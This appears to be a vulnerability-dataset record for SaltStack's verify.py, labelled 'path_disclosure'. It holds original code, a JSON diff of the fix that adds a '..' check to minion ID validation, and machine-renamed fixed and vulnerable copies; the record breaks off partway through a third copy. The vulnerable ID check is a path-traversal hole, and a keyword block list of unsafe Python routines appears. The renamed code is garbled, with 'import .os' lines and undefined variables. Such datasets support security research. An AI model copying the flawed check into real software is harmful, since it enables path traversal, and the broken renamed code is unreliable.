if is_console_configured():
log.warning(msg)
else:
sys.stderr.write('WARNING: {0}\n'.format(msg))
return False
finally:
sock.close()
return True
def verify_files(files, user):
'''
Verify that the named files exist and are owned by the named user
'''
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
except KeyError:
err = ('Failed to prepare the Salt environment for user '
'{0}. The user is not available.\n').format(user)
sys.stderr.write(err)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
for fn_ in files:
dirname = os.path.dirname(fn_)
try:
if dirname:
try:
os.makedirs(dirname)
except OSError as err:
if err.errno != errno.EEXIST:
raise
if not os.path.isfile(fn_):
with salt.utils.fopen(fn_, 'w+') as fp_:
fp_.write('')
except IOError as err:
if os.path.isfile(dirname):
msg = 'Failed to create path {0}, is {1} a file?'.format(fn_, dirname)
raise SaltSystemExit(msg=msg)
if err.errno != errno.EACCES:
raise
msg = 'No permissions to access "{0}", are you running as the correct user?'.format(fn_)
raise SaltSystemExit(msg=msg)
except OSError as err:
msg = 'Failed to create path "{0}" - {1}'.format(fn_, err)
raise SaltSystemExit(msg=msg)
stats = os.stat(fn_)
if uid != stats.st_uid:
try:
os.chown(fn_, uid, -1)
except OSError:
pass
return True
def verify_env(dirs, user, permissive=False, pki_dir='', skip_extra=False):
'''
Verify that the named directories are in place and that the environment
can shake the salt
'''
if salt.utils.is_windows():
return win_verify_env(dirs, permissive, pki_dir, skip_extra)
import pwd # after confirming not running Windows
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
groups = salt.utils.get_gid_list(user, include_default=False)
except KeyError:
err = ('Failed to prepare the Salt environment for user '
'{0}. The user is not available.\n').format(user)
sys.stderr.write(err)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
for dir_ in dirs:
if not dir_:
continue
if not os.path.isdir(dir_):
try:
cumask = os.umask(18) # 077
os.makedirs(dir_)
# If starting the process as root, chown the new dirs
if os.getuid() == 0:
os.chown(dir_, uid, gid)
os.umask(cumask)
except OSError as err:
msg = 'Failed to create directory path "{0}" - {1}\n'
sys.stderr.write(msg.format(dir_, err))
sys.exit(err.errno)
mode = os.stat(dir_)
# If starting the process as root, chown the new dirs
if os.getuid() == 0:
fmode = os.stat(dir_)
if fmode.st_uid != uid or fmode.st_gid != gid:
if permissive and fmode.st_gid in groups:
# Allow the directory to be owned by any group root
# belongs to if we say it's ok to be permissive
pass
else:
# chown the file for the new user
os.chown(dir_, uid, gid)
for subdir in [a for a in os.listdir(dir_) if 'jobs' not in a]:
fsubdir = os.path.join(dir_, subdir)
if '{0}jobs'.format(os.path.sep) in fsubdir:
continue
for root, dirs, files in os.walk(fsubdir):
for name in files:
if name.startswith('.'):
continue
path = os.path.join(root, name)
try:
fmode = os.stat(path)
except (IOError, OSError):
pass
if fmode.st_uid != uid or fmode.st_gid != gid:
if permissive and fmode.st_gid in groups:
pass
else:
# chown the file for the new user
os.chown(path, uid, gid)
for name in dirs:
path = os.path.join(root, name)
fmode = os.stat(path)
if fmode.st_uid != uid or fmode.st_gid != gid:
if permissive and fmode.st_gid in groups:
pass
else:
# chown the file for the new user
os.chown(path, uid, gid)
# Allow the pki dir to be 700 or 750, but nothing else.
# This prevents other users from writing out keys, while
# allowing the use-case of 3rd-party software (like django)
# to read in what it needs to integrate.
#
# If the permissions aren't correct, default to the more secure 700.
# If acls are enabled, the pki_dir needs to remain readable, this
# is still secure because the private keys are still only readable
# by the user running the master
if dir_ == pki_dir:
smode = stat.S_IMODE(mode.st_mode)
if smode != 448 and smode != 488:
if os.access(dir_, os.W_OK):
os.chmod(dir_, 448)
else:
msg = 'Unable to securely set the permissions of "{0}".'
msg = msg.format(dir_)
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write("CRITICAL: {0}\n".format(msg))
if skip_extra is False:
# Run the extra verification checks
zmq_version()
def check_user(user):
'''
Check user and assign process uid/gid.
'''
if salt.utils.is_windows():
return True
if user == salt.utils.get_user():
return True
import pwd # after confirming not running Windows
try:
pwuser = pwd.getpwnam(user)
try:
if hasattr(os, 'initgroups'):
os.initgroups(user, pwuser.pw_gid) # pylint: disable=minimum-python-version
else:
os.setgroups(salt.utils.get_gid_list(user, include_default=False))
os.setgid(pwuser.pw_gid)
os.setuid(pwuser.pw_uid)
# We could just reset the whole environment but let's just override
# the variables we can get from pwuser
if 'HOME' in os.environ:
os.environ['HOME'] = pwuser.pw_dir
if 'SHELL' in os.environ:
os.environ['SHELL'] = pwuser.pw_shell
for envvar in ('USER', 'LOGNAME'):
if envvar in os.environ:
os.environ[envvar] = pwuser.pw_name
except OSError:
msg = 'Salt configured to run as user "{0}" but unable to switch.'
msg = msg.format(user)
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write("CRITICAL: {0}\n".format(msg))
return False
except KeyError:
msg = 'User not found: "{0}"'.format(user)
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write("CRITICAL: {0}\n".format(msg))
return False
return True
def list_path_traversal(path):
'''
Returns a full list of directories leading up to, and including, a path.
So list_path_traversal('/path/to/salt') would return:
['/', '/path', '/path/to', '/path/to/salt']
in that order.
This routine has been tested on Windows systems as well.
list_path_traversal('c:\\path\\to\\salt') on Windows would return:
['c:\\', 'c:\\path', 'c:\\path\\to', 'c:\\path\\to\\salt']
'''
out = [path]
(head, tail) = os.path.split(path)
if tail == '':
# paths with trailing separators will return an empty string
out = [head]
(head, tail) = os.path.split(head)
while head != out[0]:
# loop until head is the same two consecutive times
out.insert(0, head)
(head, tail) = os.path.split(head)
return out
def check_path_traversal(path, user='root', skip_perm_errors=False):
'''
Walk from the root up to a directory and verify that the current
user has access to read each directory. This is used for making
sure a user can read all parent directories of the minion's key
before trying to go and generate a new key and raising an IOError
'''
for tpath in list_path_traversal(path):
if not os.access(tpath, os.R_OK):
msg = 'Could not access {0}.'.format(tpath)
if not os.path.exists(tpath):
msg += ' Path does not exist.'
else:
current_user = salt.utils.get_user()
# Make the error message more intelligent based on how
# the user invokes salt-call or whatever other script.
if user != current_user:
msg += ' Try running as user {0}.'.format(user)
else:
msg += ' Please give {0} read permissions.'.format(user)
# We don't need to bail on config file permission errors
# if the CLI
# process is run with the -a flag
if skip_perm_errors:
return
# Propagate this exception up so there isn't a sys.exit()
# in the middle of code that could be imported elsewhere.
raise SaltClientError(msg)
def check_max_open_files(opts):
'''
Check the number of max allowed open files and adjust if needed
'''
mof_c = opts.get('max_open_files', 100000)
if sys.platform.startswith('win'):
# Check the Windows API for more detail on this
# http://msdn.microsoft.com/en-us/library/xt874334(v=vs.71).aspx
# and the python binding http://timgolden.me.uk/pywin32-docs/win32file.html
mof_s = mof_h = win32file._getmaxstdio()
else:
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
accepted_keys_dir = os.path.join(opts.get('pki_dir'), 'minions')
accepted_count = len(os.listdir(accepted_keys_dir))
log.debug(
'This salt-master instance has accepted {0} minion keys.'.format(
accepted_count
)
)
level = logging.INFO
if (accepted_count * 4) <= mof_s:
# We check for the soft value of max open files here because that's the
# value the user chose to raise to.
#
# The number of accepted keys multiplied by four(4) is lower than the
# soft value, everything should be OK
return
msg = (
'The number of accepted minion keys({0}) should be lower than 1/4 '
'of the max open files soft setting({1}). '.format(
accepted_count, mof_s
)
)
if accepted_count >= mof_s:
# This should never occur, it might have already crashed
msg += 'salt-master will crash pretty soon! '
level = logging.CRITICAL
elif (accepted_count * 2) >= mof_s:
# This is way too low, CRITICAL
level = logging.CRITICAL
elif (accepted_count * 3) >= mof_s:
level = logging.WARNING
# The accepted count is more than 3 time, WARN
elif (accepted_count * 4) >= mof_s:
level = logging.INFO
if mof_c < mof_h:
msg += ('According to the system\'s hard limit, there\'s still a '
'margin of {0} to raise the salt\'s max_open_files '
'setting. ').format(mof_h - mof_c)
msg += 'Please consider raising this value.'
log.log(level=level, msg=msg)
def clean_path(root, path, subdir=False):
'''
Accepts the root the path needs to be under and verifies that the path is
under said root. Pass in subdir=True if the path can result in a
subdirectory of the root instead of having to reside directly in the root
'''
if not os.path.isabs(root):
return ''
if not os.path.isabs(path):
path = os.path.join(root, path)
path = os.path.normpath(path)
if subdir:
if path.startswith(root):
return path
else:
if os.path.dirname(path) == os.path.normpath(root):
return path
return ''
def valid_id(opts, id_):
'''
Returns if the passed id is valid
'''
try:
if any(x in id_ for x in ('/', '\\', '\0')):
return False
return bool(clean_path(opts['pki_dir'], id_))
except (AttributeError, KeyError, TypeError):
return False
def safe_py_code(code):
'''
Check a string to see if it has any potentially unsafe routines which
could be executed via python, this routine is used to improve the
safety of modules suct as virtualenv
'''
bads = (
'import',
';',
'subprocess',
'eval',
'open',
'file',
'exec',
'input')
for bad in bads:
if code.count(bad):
return False
return True
def verify_log(opts):
'''
If an insecre logging configuration is found, show a warning
'''
level = LOG_LEVELS.get(str(opts.get('log_level')).lower(), logging.NOTSET)
if level < logging.INFO:
log.warning('Insecure logging configuration detected! Sensitive data may be logged.')
def win_verify_env(dirs, permissive=False, pki_dir='', skip_extra=False):
'''
Verify that the named directories are in place and that the environment
can shake the salt
'''
import salt.utils.win_functions
import salt.utils.win_dacl
# Get the root path directory where salt is installed
path = dirs[0]
while os.path.basename(path) not in ['salt', 'salt-tests-tmpdir']:
path, base = os.path.split(path)
# Create the root path directory if missing
if not os.path.isdir(path):
os.makedirs(path)
# Set permissions to the root path directory
current_user = salt.utils.win_functions.get_current_user()
if salt.utils.win_functions.is_admin(current_user):
try:
# Make the Administrators group owner
# Use the SID to be locale agnostic
salt.utils.win_dacl.set_owner(path, 'S-1-5-32-544')
except CommandExecutionError:
msg = 'Unable to securely set the owner of "{0}".'.format(path)
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write("CRITICAL: {0}\n".format(msg))
if not permissive:
try:
# Get a clean dacl by not passing an obj_name
dacl = salt.utils.win_dacl.dacl()
# Add aces to the dacl, use the GUID (locale non-specific)
# Administrators Group
dacl.add_ace('S-1-5-32-544', 'grant', 'full_control',
'this_folder_subfolders_files')
# System
dacl.add_ace('S-1-5-18', 'grant', 'full_control',
'this_folder_subfolders_files')
# Owner
dacl.add_ace('S-1-3-4', 'grant', 'full_control',
'this_folder_subfolders_files')
# Save the dacl to the object
dacl.save(path, True)
except CommandExecutionError:
msg = 'Unable to securely set the permissions of ' \
'"{0}".'.format(path)
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write("CRITICAL: {0}\n".format(msg))
# Create the directories
for dir_ in dirs:
if not dir_:
continue
if not os.path.isdir(dir_):
try:
os.makedirs(dir_)
except OSError as err:
msg = 'Failed to create directory path "{0}" - {1}\n'
sys.stderr.write(msg.format(dir_, err))
sys.exit(err.errno)
# The PKI dir gets its own permissions
if dir_ == pki_dir:
try:
# Make Administrators group the owner
salt.utils.win_dacl.set_owner(path, 'S-1-5-32-544')
# Give Admins, System and Owner permissions
# Get a clean dacl by not passing an obj_name
dacl = salt.utils.win_dacl.dacl()
# Add aces to the dacl, use the GUID (locale non-specific)
# Administrators Group
dacl.add_ace('S-1-5-32-544', 'grant', 'full_control',
'this_folder_subfolders_files')
# System
dacl.add_ace('S-1-5-18', 'grant', 'full_control',
'this_folder_subfolders_files')
# Owner
dacl.add_ace('S-1-3-4', 'grant', 'full_control',
'this_folder_subfolders_files')
# Save the dacl to the object
dacl.save(dir_, True)
except CommandExecutionError:
msg = 'Unable to securely set the permissions of "{0}".'
msg = msg.format(dir_)
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write("CRITICAL: {0}\n".format(msg))
if skip_extra is False:
# Run the extra verification checks
zmq_version()
| path_disclosure | {
"code": [
"def clean_id(id_):",
" Returns if the passed id is clean.",
" if re.search(r'\\.\\.\\{sep}'.format(sep=os.sep), id_):",
" return False",
" return True",
" return bool(clean_path(opts['pki_dir'], id_)) and clean_id(id_)",
" except (AttributeError, KeyError, TypeError) as e:"
],
"line_no": [
483,
485,
487,
488,
489,
497,
498
]
} | {
"code": [
" if any(x in id_ for x in ('/', '\\\\', '\\0')):",
" return False",
" except (AttributeError, KeyError, TypeError):"
],
"line_no": [
488,
489,
491
]
} |
from __future__ import absolute_import
import .os
import re
import sys
import stat
import .errno
import .socket
import .logging
try:
import win32file
except ImportError:
import resource
from salt.log import is_console_configured
from salt.log.setup import LOG_LEVELS
from salt.exceptions import SaltClientError, SaltSystemExit, \
CommandExecutionError
import salt.defaults.exitcodes
import salt.utils
VAR_0 = logging.getLogger(__name__)
def FUNC_0():
try:
import zmq
except Exception:
return True
VAR_18 = zmq.__version__
VAR_19 = re.match(r'^(\d+)\.(\d+)(?:\.(\d+))?', VAR_18)
if not VAR_19:
VAR_32 = "Using untested zmq python bindings version: '{0}'".format(VAR_18)
if is_console_configured():
VAR_0.warning(VAR_32)
else:
sys.stderr.write("WARNING {0}\n".format(VAR_32))
return True
VAR_20, VAR_21, VAR_22 = VAR_19.groups()
if VAR_20.isdigit():
VAR_20 = int(VAR_20)
if VAR_21.isdigit():
VAR_21 = int(VAR_21)
if VAR_22 and VAR_22.isdigit():
VAR_22 = int(VAR_22)
if VAR_20 == 2 and VAR_21 == 1:
if "dev" in VAR_18 and not VAR_22:
VAR_32 = 'Using dev zmq module, please report unexpected results'
if is_console_configured():
VAR_0.warning(VAR_32)
else:
sys.stderr.write("WARNING: {0}\n".format(VAR_32))
return True
elif VAR_22 and VAR_22 >= 9:
return True
elif VAR_20 > 2 or (VAR_20 == 2 and VAR_21 > 1):
return True
VAR_0.critical('ZeroMQ python bindings >= 2.1.9 are required')
if 'salt-master' in sys.argv[0]:
VAR_32 = ('The Salt Master is unstable using a ZeroMQ version '
'lower than 2.1.11 and requires this fix: http://lists.zeromq.'
'org/pipermail/zeromq-dev/2011-June/012094.html')
if is_console_configured():
VAR_0.critical(VAR_32)
else:
sys.stderr.write('CRITICAL {0}\n'.format(VAR_32))
return False
def FUNC_1(VAR_1):
VAR_23 = socket.AF_INET
try:
VAR_35 = socket.getaddrinfo(
VAR_1 or None, None, socket.AF_UNSPEC, socket.SOCK_STREAM
)
if not VAR_35:
return VAR_23
VAR_36 = VAR_35[0]
return VAR_36[0]
except socket.gaierror:
return VAR_23
def FUNC_2(VAR_2, VAR_3, VAR_4):
VAR_24 = FUNC_1(VAR_2)
for port in VAR_3, VAR_4:
VAR_37 = socket.socket(VAR_24, socket.SOCK_STREAM)
try:
VAR_37.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
VAR_37.bind((VAR_2, int(port)))
except Exception as exc:
VAR_32 = 'Unable to bind socket {0}:{1}'.format(VAR_2, port)
if exc.args:
VAR_32 = '{0}, error: {1}'.format(VAR_32, str(exc))
else:
VAR_32 = '{0}, this might not be a problem.'.format(VAR_32)
msg += '; Is there another salt-master running?'
if is_console_configured():
VAR_0.warning(VAR_32)
else:
sys.stderr.write('WARNING: {0}\n'.format(VAR_32))
return False
finally:
VAR_37.close()
return True
def FUNC_3(VAR_5, VAR_6):
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
try:
VAR_38 = pwd.getpwnam(VAR_6)
VAR_39 = VAR_38[2]
except KeyError:
VAR_49 = ('Failed to prepare the Salt environment for VAR_6 '
'{0}. The VAR_6 is not available.\n').format(VAR_6)
sys.stderr.write(VAR_49)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
for fn_ in VAR_5:
VAR_40 = VAR_54.path.dirname(fn_)
try:
if VAR_40:
try:
VAR_54.makedirs(VAR_40)
except OSError as VAR_49:
if VAR_49.errno != errno.EEXIST:
raise
if not VAR_54.path.isfile(fn_):
with salt.utils.fopen(fn_, 'w+') as fp_:
fp_.write('')
except IOError as VAR_49:
if VAR_54.path.isfile(VAR_40):
VAR_32 = 'Failed to create VAR_11 {0}, is {1} a file?'.format(fn_, VAR_40)
raise SaltSystemExit(VAR_32=msg)
if VAR_49.errno != errno.EACCES:
raise
VAR_32 = 'No permissions to access "{0}", are you running as the correct VAR_6?'.format(fn_)
raise SaltSystemExit(VAR_32=msg)
except OSError as VAR_49:
VAR_32 = 'Failed to create VAR_11 "{0}" - {1}'.format(fn_, VAR_49)
raise SaltSystemExit(VAR_32=msg)
VAR_41 = VAR_54.stat(fn_)
if VAR_39 != VAR_41.st_uid:
try:
VAR_54.chown(fn_, VAR_39, -1)
except OSError:
pass
return True
def FUNC_4(VAR_7, VAR_6, VAR_8=False, VAR_9='', VAR_10=False):
if salt.utils.is_windows():
return FUNC_14(VAR_7, VAR_8, VAR_9, VAR_10)
import pwd # after confirming not running Windows
try:
VAR_38 = pwd.getpwnam(VAR_6)
VAR_39 = VAR_38[2]
VAR_42 = VAR_38[3]
VAR_43 = salt.utils.get_gid_list(VAR_6, include_default=False)
except KeyError:
VAR_49 = ('Failed to prepare the Salt environment for VAR_6 '
'{0}. The VAR_6 is not available.\n').format(VAR_6)
sys.stderr.write(VAR_49)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
for dir_ in VAR_7:
if not dir_:
continue
if not VAR_54.path.isdir(dir_):
try:
VAR_52 = VAR_54.umask(18) # 077
VAR_54.makedirs(dir_)
if VAR_54.getuid() == 0:
VAR_54.chown(dir_, VAR_39, VAR_42)
VAR_54.umask(VAR_52)
except OSError as VAR_49:
VAR_32 = 'Failed to create directory VAR_11 "{0}" - {1}\n'
sys.stderr.write(VAR_32.format(dir_, VAR_49))
sys.exit(VAR_49.errno)
VAR_44 = VAR_54.stat(dir_)
if VAR_54.getuid() == 0:
VAR_50 = VAR_54.stat(dir_)
if VAR_50.st_uid != VAR_39 or VAR_50.st_gid != VAR_42:
if VAR_8 and VAR_50.st_gid in VAR_43:
pass
else:
VAR_54.chown(dir_, VAR_39, VAR_42)
for VAR_15 in [a for a in VAR_54.listdir(dir_) if 'jobs' not in a]:
VAR_53 = VAR_54.path.join(dir_, VAR_15)
if '{0}jobs'.format(VAR_54.path.sep) in VAR_53:
continue
for VAR_14, VAR_7, VAR_5 in VAR_54.walk(VAR_53):
for name in VAR_5:
if name.startswith('.'):
continue
VAR_11 = VAR_54.path.join(VAR_14, name)
try:
VAR_50 = VAR_54.stat(VAR_11)
except (IOError, OSError):
pass
if VAR_50.st_uid != VAR_39 or VAR_50.st_gid != VAR_42:
if VAR_8 and VAR_50.st_gid in VAR_43:
pass
else:
VAR_54.chown(VAR_11, VAR_39, VAR_42)
for name in VAR_7:
VAR_11 = VAR_54.path.join(VAR_14, name)
VAR_50 = VAR_54.stat(VAR_11)
if VAR_50.st_uid != VAR_39 or VAR_50.st_gid != VAR_42:
if VAR_8 and VAR_50.st_gid in VAR_43:
pass
else:
VAR_54.chown(VAR_11, VAR_39, VAR_42)
if dir_ == VAR_9:
VAR_51 = stat.S_IMODE(VAR_44.st_mode)
if VAR_51 != 448 and VAR_51 != 488:
if VAR_54.access(dir_, VAR_54.W_OK):
VAR_54.chmod(dir_, 448)
else:
VAR_32 = 'Unable to securely set the permissions of "{0}".'
VAR_32 = msg.format(dir_)
if is_console_configured():
VAR_0.critical(VAR_32)
else:
sys.stderr.write("CRITICAL: {0}\n".format(VAR_32))
if VAR_10 is False:
FUNC_0()
def FUNC_5(VAR_6):
if salt.utils.is_windows():
return True
if VAR_6 == salt.utils.get_user():
return True
import pwd # after confirming not running Windows
try:
VAR_45 = pwd.getpwnam(VAR_6)
try:
if hasattr(VAR_54, 'initgroups'):
VAR_54.initgroups(VAR_6, VAR_45.pw_gid) # pylint: disable=minimum-python-version
else:
VAR_54.setgroups(salt.utils.get_gid_list(VAR_6, include_default=False))
VAR_54.setgid(VAR_45.pw_gid)
VAR_54.setuid(VAR_45.pw_uid)
if 'HOME' in VAR_54.environ:
VAR_54.environ['HOME'] = VAR_45.pw_dir
if 'SHELL' in VAR_54.environ:
VAR_54.environ['SHELL'] = VAR_45.pw_shell
for VAR_56 in ('USER', 'LOGNAME'):
if VAR_56 in VAR_54.environ:
VAR_54.environ[VAR_56] = VAR_45.pw_name
except OSError:
VAR_32 = 'Salt configured to run as VAR_6 "{0}" but unable to switch.'
VAR_32 = msg.format(VAR_6)
if is_console_configured():
VAR_0.critical(VAR_32)
else:
sys.stderr.write("CRITICAL: {0}\n".format(VAR_32))
return False
except KeyError:
VAR_32 = 'User not found: "{0}"'.format(VAR_6)
if is_console_configured():
VAR_0.critical(VAR_32)
else:
sys.stderr.write("CRITICAL: {0}\n".format(VAR_32))
return False
return True
def FUNC_6(VAR_11):
VAR_25 = [VAR_11]
(VAR_26, VAR_27) = VAR_54.path.split(VAR_11)
if VAR_27 == '':
VAR_25 = [VAR_26]
(head, VAR_27) = VAR_54.path.split(VAR_26)
while VAR_26 != VAR_25[0]:
VAR_25.insert(0, VAR_26)
(head, VAR_27) = VAR_54.path.split(VAR_26)
return VAR_25
def FUNC_7(VAR_11, VAR_6='root', VAR_12=False):
for tpath in FUNC_6(VAR_11):
if not VAR_54.access(tpath, VAR_54.R_OK):
VAR_32 = 'Could not access {0}.'.format(tpath)
if not VAR_54.path.exists(tpath):
VAR_32 += ' Path does not exist.'
else:
VAR_34 = salt.utils.get_user()
if VAR_6 != VAR_34:
VAR_32 += ' Try running as VAR_6 {0}.'.format(VAR_6)
else:
VAR_32 += ' Please give {0} read permissions.'.format(VAR_6)
if VAR_12:
return
raise SaltClientError(VAR_32)
def FUNC_8(VAR_13):
VAR_28 = VAR_13.get('max_open_files', 100000)
if sys.platform.startswith('win'):
VAR_46 = VAR_47 = win32file._getmaxstdio()
else:
VAR_46, VAR_47 = resource.getrlimit(resource.RLIMIT_NOFILE)
VAR_29 = VAR_54.path.join(VAR_13.get('pki_dir'), 'minions')
VAR_30 = len(VAR_54.listdir(VAR_29))
VAR_0.debug(
'This salt-master instance has accepted {0} minion keys.'.format(
VAR_30
)
)
VAR_31 = logging.INFO
if (VAR_30 * 4) <= VAR_46:
return
VAR_32 = (
'The number of accepted minion keys({0}) should be lower than 1/4 '
'of the max open VAR_5 soft setting({1}). '.format(
VAR_30, VAR_46
)
)
if VAR_30 >= VAR_46:
VAR_32 += 'salt-master will crash pretty soon! '
VAR_31 = logging.CRITICAL
elif (VAR_30 * 2) >= VAR_46:
VAR_31 = logging.CRITICAL
elif (VAR_30 * 3) >= VAR_46:
VAR_31 = logging.WARNING
elif (VAR_30 * 4) >= VAR_46:
VAR_31 = logging.INFO
if VAR_28 < VAR_47:
VAR_32 += ('According to the system\'s hard limit, there\'s still a '
'margin of {0} to raise the salt\'s max_open_files '
'setting. ').format(VAR_47 - VAR_28)
VAR_32 += 'Please consider raising this value.'
VAR_0.log(VAR_31=level, VAR_32=msg)
def FUNC_9(VAR_14, VAR_11, VAR_15=False):
if not VAR_54.path.isabs(VAR_14):
return ''
if not VAR_54.path.isabs(VAR_11):
VAR_11 = VAR_54.path.join(VAR_14, VAR_11)
VAR_11 = VAR_54.path.normpath(VAR_11)
if VAR_15:
if VAR_11.startswith(VAR_14):
return VAR_11
else:
if VAR_54.path.dirname(VAR_11) == VAR_54.path.normpath(VAR_14):
return VAR_11
return ''
def FUNC_10(VAR_16):
if re.search(r'\.\.\{sep}'.format(sep=VAR_54.sep), VAR_16):
return False
return True
def FUNC_11(VAR_13, VAR_16):
try:
return bool(FUNC_9(VAR_13['pki_dir'], VAR_16)) and FUNC_10(VAR_16)
except (AttributeError, KeyError, TypeError) as e:
return False
def FUNC_12(VAR_17):
VAR_33 = (
'import',
';',
'subprocess',
'eval',
'open',
'file',
'exec',
'input')
for bad in VAR_33:
if VAR_17.count(bad):
return False
return True
def FUNC_13(VAR_13):
VAR_31 = LOG_LEVELS.get(str(VAR_13.get('log_level')).lower(), logging.NOTSET)
if VAR_31 < logging.INFO:
VAR_0.warning('Insecure logging configuration detected! Sensitive data may be logged.')
def FUNC_14(VAR_7, VAR_8=False, VAR_9='', VAR_10=False):
import salt.utils.win_functions
import salt.utils.win_dacl
VAR_11 = VAR_7[0]
while VAR_54.path.basename(VAR_11) not in ['salt', 'salt-tests-tmpdir']:
VAR_11, VAR_48 = VAR_54.path.split(VAR_11)
if not VAR_54.path.isdir(VAR_11):
VAR_54.makedirs(VAR_11)
VAR_34 = salt.utils.win_functions.get_current_user()
if salt.utils.win_functions.is_admin(VAR_34):
try:
salt.utils.win_dacl.set_owner(VAR_11, 'S-1-5-32-544')
except CommandExecutionError:
VAR_32 = 'Unable to securely set the owner of "{0}".'.format(VAR_11)
if is_console_configured():
VAR_0.critical(VAR_32)
else:
sys.stderr.write("CRITICAL: {0}\n".format(VAR_32))
if not VAR_8:
try:
VAR_55 = salt.utils.win_dacl.dacl()
VAR_55.add_ace('S-1-5-32-544', 'grant', 'full_control',
'this_folder_subfolders_files')
VAR_55.add_ace('S-1-5-18', 'grant', 'full_control',
'this_folder_subfolders_files')
VAR_55.add_ace('S-1-3-4', 'grant', 'full_control',
'this_folder_subfolders_files')
VAR_55.save(VAR_11, True)
except CommandExecutionError:
VAR_32 = 'Unable to securely set the permissions of ' \
'"{0}".'.format(VAR_11)
if is_console_configured():
VAR_0.critical(VAR_32)
else:
sys.stderr.write("CRITICAL: {0}\n".format(VAR_32))
for dir_ in VAR_7:
if not dir_:
continue
if not VAR_54.path.isdir(dir_):
try:
VAR_54.makedirs(dir_)
except OSError as VAR_49:
VAR_32 = 'Failed to create directory VAR_11 "{0}" - {1}\n'
sys.stderr.write(VAR_32.format(dir_, VAR_49))
sys.exit(VAR_49.errno)
if dir_ == VAR_9:
try:
salt.utils.win_dacl.set_owner(VAR_11, 'S-1-5-32-544')
VAR_55 = salt.utils.win_dacl.dacl()
VAR_55.add_ace('S-1-5-32-544', 'grant', 'full_control',
'this_folder_subfolders_files')
VAR_55.add_ace('S-1-5-18', 'grant', 'full_control',
'this_folder_subfolders_files')
VAR_55.add_ace('S-1-3-4', 'grant', 'full_control',
'this_folder_subfolders_files')
VAR_55.save(dir_, True)
except CommandExecutionError:
VAR_32 = 'Unable to securely set the permissions of "{0}".'
VAR_32 = msg.format(dir_)
if is_console_configured():
VAR_0.critical(VAR_32)
else:
sys.stderr.write("CRITICAL: {0}\n".format(VAR_32))
if VAR_10 is False:
FUNC_0()
|
from __future__ import absolute_import
import .os
import re
import sys
import stat
import .errno
import .socket
import .logging
try:
import win32file
except ImportError:
import resource
from salt.log import is_console_configured
from salt.log.setup import LOG_LEVELS
from salt.exceptions import SaltClientError, SaltSystemExit, \
CommandExecutionError
import salt.defaults.exitcodes
import salt.utils
VAR_0 = logging.getLogger(__name__)
def FUNC_0():
try:
import zmq
except Exception:
return True
VAR_18 = zmq.__version__
VAR_19 = re.match(r'^(\d+)\.(\d+)(?:\.(\d+))?', VAR_18)
if not VAR_19:
VAR_32 = "Using untested zmq python bindings version: '{0}'".format(VAR_18)
if is_console_configured():
VAR_0.warning(VAR_32)
else:
sys.stderr.write("WARNING {0}\n".format(VAR_32))
return True
VAR_20, VAR_21, VAR_22 = VAR_19.groups()
if VAR_20.isdigit():
VAR_20 = int(VAR_20)
if VAR_21.isdigit():
VAR_21 = int(VAR_21)
if VAR_22 and VAR_22.isdigit():
VAR_22 = int(VAR_22)
if VAR_20 == 2 and VAR_21 == 1:
if "dev" in VAR_18 and not VAR_22:
VAR_32 = 'Using dev zmq module, please report unexpected results'
if is_console_configured():
VAR_0.warning(VAR_32)
else:
sys.stderr.write("WARNING: {0}\n".format(VAR_32))
return True
elif VAR_22 and VAR_22 >= 9:
return True
elif VAR_20 > 2 or (VAR_20 == 2 and VAR_21 > 1):
return True
VAR_0.critical('ZeroMQ python bindings >= 2.1.9 are required')
if 'salt-master' in sys.argv[0]:
VAR_32 = ('The Salt Master is unstable using a ZeroMQ version '
'lower than 2.1.11 and requires this fix: http://lists.zeromq.'
'org/pipermail/zeromq-dev/2011-June/012094.html')
if is_console_configured():
VAR_0.critical(VAR_32)
else:
sys.stderr.write('CRITICAL {0}\n'.format(VAR_32))
return False
def FUNC_1(VAR_1):
VAR_23 = socket.AF_INET
try:
VAR_35 = socket.getaddrinfo(
VAR_1 or None, None, socket.AF_UNSPEC, socket.SOCK_STREAM
)
if not VAR_35:
return VAR_23
VAR_36 = VAR_35[0]
return VAR_36[0]
except socket.gaierror:
return VAR_23
def FUNC_2(VAR_2, VAR_3, VAR_4):
VAR_24 = FUNC_1(VAR_2)
for port in VAR_3, VAR_4:
VAR_37 = socket.socket(VAR_24, socket.SOCK_STREAM)
try:
VAR_37.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
VAR_37.bind((VAR_2, int(port)))
except Exception as exc:
VAR_32 = 'Unable to bind socket {0}:{1}'.format(VAR_2, port)
if exc.args:
VAR_32 = '{0}, error: {1}'.format(VAR_32, str(exc))
else:
VAR_32 = '{0}, this might not be a problem.'.format(VAR_32)
msg += '; Is there another salt-master running?'
if is_console_configured():
VAR_0.warning(VAR_32)
else:
sys.stderr.write('WARNING: {0}\n'.format(VAR_32))
return False
finally:
VAR_37.close()
return True
def FUNC_3(VAR_5, VAR_6):
    """Ensure every file in VAR_5 exists and is owned by user VAR_6.

    Missing parent directories and empty files are created as needed.
    Exits the process when VAR_6 does not exist; raises SaltSystemExit
    on unrecoverable filesystem errors; no-op (True) on Windows.
    NOTE(review): VAR_54 appears to be this module's alias for ``os``
    (used as VAR_54.path / VAR_54.stat throughout) -- confirm.
    """
    if salt.utils.is_windows():
        return True
    import pwd  # after confirming not running Windows
    try:
        VAR_38 = pwd.getpwnam(VAR_6)
        VAR_39 = VAR_38[2]
    except KeyError:
        VAR_49 = ('Failed to prepare the Salt environment for VAR_6 '
                 '{0}. The VAR_6 is not available.\n').format(VAR_6)
        sys.stderr.write(VAR_49)
        sys.exit(salt.defaults.exitcodes.EX_NOUSER)
    for fn_ in VAR_5:
        VAR_40 = VAR_54.path.dirname(fn_)
        try:
            if VAR_40:
